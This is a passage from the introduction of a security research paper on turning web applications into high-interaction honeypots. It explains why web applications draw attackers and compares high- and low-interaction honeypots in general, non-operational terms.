Web application technologies like PHP, CGI, Javascript, and Ajax have made it much easier for people to construct and deploy services on the Internet. Unfortunately, this has opened a wide avenue for new attacks since it is as easy to unintentionally introduce new vulnerabilities into web applications as it is to intentionally introduce new functionality. Consequently, web applications have increasingly been the focus of attackers.

Honeypots are popular and effective tools for studying new attack patterns. A honeypot is an information system resource whose value lies in unauthorized or illicit use of that resource [16]. Honeypots are electronic decoys, that pretend to be normal system but are really waiting to be attacked and compromised for the purpose of tracking attackers. Honeypots are equipped with special monitoring software which makes it easier to study successful attacks in detail. Honeynets are networks of honeypots have proven to be a very effective tool in learning more about Internet crime like credit card fraud [11] or botnets [4] and as sensors in intrusion detection systems.

The simplest form of a honeypot is a real vulnerable system that has been modified to include surveillance methods. Such a system is called a high-interaction honeypots because the attacker is able to fully interact with the honeypot just like a real system. This offers the best potential for analyzing all aspects of an attack, but also introduces risk that the attacker will use the capabilities of the system to attack others. A high-interaction honeypot must disguise itself as a real machine, hiding its surveillance methods to all users even if they have root privileges. This is usually done using very risky and resource intensive techniques like full system emulators [24] or rootkit-type software as in the GenIII honeynet [1]. To monitor automated attacks as for example those performed by autonomously spreading malware, such effort is not always required. So called low-interaction honeypots offer limited services to the attacker, for example by emulating only those parts of a service which are vulnerable. Low-interaction honeypots can typically be deployed with fewer resources because they are not fully offering the expected services and they also incur less risk. However, it is more likely that the attacker will cut short the attack before useful information can be learned either because the system does not support functionality needed for the attack or because the attacker suspects the system is a honeypot. A popular example of this kind of honeypots is honeyd [17], which is very easy to deploy (at least in comparison to a high-interaction honeypot).

Download pdf A Generic Toolkit for Converting Web Applications Into High-Interaction Honeypots